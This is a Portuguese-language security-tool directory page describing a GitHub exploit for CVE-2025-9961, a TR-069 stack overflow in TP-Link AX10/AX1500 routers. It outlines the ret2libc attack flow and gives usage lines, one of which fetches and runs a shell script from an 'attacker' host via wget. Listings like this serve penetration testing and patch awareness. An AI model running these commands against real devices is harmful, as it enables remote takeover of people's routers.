Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-9961 — Exploit para TP-Link AX10/AX1500 de estouro de buffer de pilha no CWMP (TR-069) possibilitando execução remota de código via ret2libc com bypass de ASLR. Inclui modos de apenas verificação, DoS e execução de comandos. | Kitploit
Ferramentas/GitHubGitHub/yt2w/cve-2025-9961
Segurança de Sistemas EmbarcadosSegurança IoTAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança de HardwareFerramenta de Acesso RemotoExploração de Binários
GitHubyt2w/cve-2025-9961

CVE-2025-9961

Exploit para TP-Link AX10/AX1500 de estouro de buffer de pilha no CWMP (TR-069) possibilitando execução remota de código via ret2libc com bypass de ASLR. Inclui modos de apenas verificação, DoS e execução de comandos.

61há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

CVE-2025-9961

TP-Link AX10/AX1500 CWMP Estouro de Buffer RCE

Visão Geral

Estouro de buffer baseado em pilha no CWMP (TR-069) levando à execução remota de código.

CampoValor
ProdutoTP-Link AX10, AX1500
AfetadoAX10 < 1.2.1, AX1500 < 1.3.11
CVSS8.6 (Alto)
TipoEstouro de Buffer de Pilha
VetorCWMP/TR-069 (porta 7547)
ImpactoExecução Remota de Código

Fluxo de Ataque

root@kitploit:~
flowchart LR
    A[Attacker] --> B["Malicious ACS"]
    B --> C["SetParameterValues"]
    C --> D["Stack Overflow"]
    D --> E["Overwrite PC"]
    E --> F["ret2libc"]
    F --> G["system()"]
    G --> H["RCE"]

Detalhes Técnicos

A vulnerabilidade está no tratamento do processo cwmp de requisições SOAP SetParameterValues. A entrada é usada para calcular o tamanho do buffer sem verificação de limites.

Exploração:

  • Use ret2libc para chamar system()
  • Bypass de ASLR via força bruta
  • Reinícios do serviço permitem tentativas repetidas

Uso

root@kitploit:~
python exploit.py <target_ip> --check-only

python exploit.py 192.168.0.1 --dos

python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"

Parâmetros

Requisitos

Nenhum (usa biblioteca padrão)

Mitigação

  • Atualizar para firmware corrigido
  • Desabilitar TR-069/CWMP
  • Restringir acesso à porta 7547

Aviso Legal

Apenas para testes de segurança autorizados.

Baixar ferramenta
FlagDescriçãoPadrão
-p, --portPorta CWMP7547
-c, --commandComando para RCEnenhum
-t, --timeoutTimeout do socket10
--dosApenas modo DoSdesligado
--check-onlyVerificar se é vulneráveldesligado